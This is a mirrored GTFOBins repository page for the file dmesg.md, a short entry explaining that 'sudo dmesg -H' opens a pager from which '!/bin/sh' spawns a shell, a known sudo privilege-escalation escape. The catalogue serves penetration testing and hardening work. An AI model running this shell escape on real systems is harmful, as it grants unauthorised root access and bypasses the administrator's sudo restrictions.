1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/dmesg.md
Andrea Cardaci 3cbfa05169 Add dmesg
Close #32.
2018-11-12 15:11:50 +01:00

10 lines
205 B
Markdown

---
description: |
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
sudo:
- code: |
sudo dmesg -H
!/bin/sh
---